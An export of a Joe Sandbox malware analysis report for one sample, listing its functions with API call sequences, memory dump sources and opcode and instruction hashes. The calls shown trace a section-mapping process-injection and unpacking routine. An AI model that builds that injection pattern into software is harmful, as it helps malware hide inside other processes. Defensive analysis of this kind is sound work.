Instruction Fuzzy Hash: DF91F371C46528ABC721AB65EC48ADF7B78EF49351F01806EF509A7150CB381A86CFED

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02DD03D8 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DD0400
Module32First.KERNEL32(00000000,00000224), ref: 02DD0420

Memory Dump Source

Source File: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2dcd000_1HGXcC63iu.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 630991527fc547d62c36ee996d41be250d192eb940440a7321f2c8722511e997
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 29F09636200B156BD7203BF9A88CF6F76E8EF89726F100528E696915C0DB70EC458A61

Function 02D9003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02D9024D

Strings

kernel32.dll, xrefs: 02D9008F, 02D90095
cess, xrefs: 02D9018D

Memory Dump Source

Source File: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d90000_1HGXcC63iu.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 19c608a10c3f047ae6230d16906b32d707d0f14c61c47ef9a3938d3e8988d833
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 3C525874A01229DFDB64CF68D984BA8BBB1BF09315F1480D9E94DAB351DB30AE85CF14

Function 004178E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(004193F8), ref: 00417912
InterlockedDecrement.KERNEL32(?), ref: 00417960

Strings

k`, xrefs: 00417943
}$, xrefs: 00417967

Memory Dump Source

Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd

Similarity

API ID: DecrementInterlockedLibraryLoad
String ID: k`$}$
API String ID: 1728580480-956986773
Opcode ID: 3003b45fd1169c669f61d0907577ac23474fafbff37243fa5960b7ee75e7cf2e
Instruction ID: 134cc60ee6fbcd4284a2d3b71c5bd9fcb84d361ebfdf38d762708a44da6be8e6
Opcode Fuzzy Hash: 3003b45fd1169c669f61d0907577ac23474fafbff37243fa5960b7ee75e7cf2e
Instruction Fuzzy Hash: EE2136B0D982158BDB309B24D8817EA7730EB49321F11447FD98997281CA3C58C9CB9D

Function 00417290 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B1AF70), ref: 0041736F
GetProcAddress.KERNEL32(00000000,0041CF58), ref: 004173AC
VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 004173CB

Strings

, xrefs: 004172D5

Memory Dump Source

Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
Instruction ID: 6495229f78f8176a921cc79dd6658c6ebdac2eeea773cb5c0c066b47575b63c9
Opcode Fuzzy Hash: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
Instruction Fuzzy Hash: 62313E559C93C4CAE301CBB8FC447553B639B29744F5484689148CB3E2D7BA252AC76E

Function 02D90E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02D90223,?,?), ref: 02D90E19
SetErrorMode.KERNELBASE(00000000,?,?,02D90223,?,?), ref: 02D90E1E

Memory Dump Source

Source File: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d90000_1HGXcC63iu.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 89d7fe53a4739ae435d3ec7ad4b23bed7c1142db86f615a5dd78f8ce4d487e67
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: D6D0123514512877DB002A94DC09BCD7B1CDF05B67F008011FB0DD9180C770994046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02DD0097 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DD00E8

Memory Dump Source

Source File: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2dcd000_1HGXcC63iu.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 305ba912bfa7997b51666b2c582c8ad426b9d136ad82fb3b3e9f0584a38af66b
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: A8112B79A00208EFDB01DF98C985E98BBF5EF08351F058094FA489B361D371EA50DF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00417260 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B1AF6C,004178C4), ref: 00417268

Memory Dump Source

Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10

Non-executed Functions

Function 02D9092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 02D9095F
l, xrefs: 02D90966
GetProcAddress., xrefs: 02D909DC, 02D909DF, 02D909E4

Memory Dump Source

Source File: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d90000_1HGXcC63iu.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 9eeb17fdbd48a56657b25916814786f419fdf2f5f63ab0abac8ed0b3c1dbfc28
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 89313AB6900609DFDB10CF99D880AAEBBF9FF48325F19414AE841A7310D771EA45CFA4

Function 02DCFCB5 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2dcd000_1HGXcC63iu.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: e11adb9f47b2abbe56d3c95416909f0c304446f28bb2b0849516fdf2296607c6
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 66115A72340101AFDB54DF55DC91EE673ABEB89220B29806AED04CB715D675EC42CB60

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 02D90D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d90000_1HGXcC63iu.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 7099863ea9e100599d30a29228cb7206aacd7d3adb79b8ef829c398448bb22d8
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 5401D676A106048FDF21CF24E804BAA33F9FB86217F4584B5E90AD7781E774AD41CB90

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
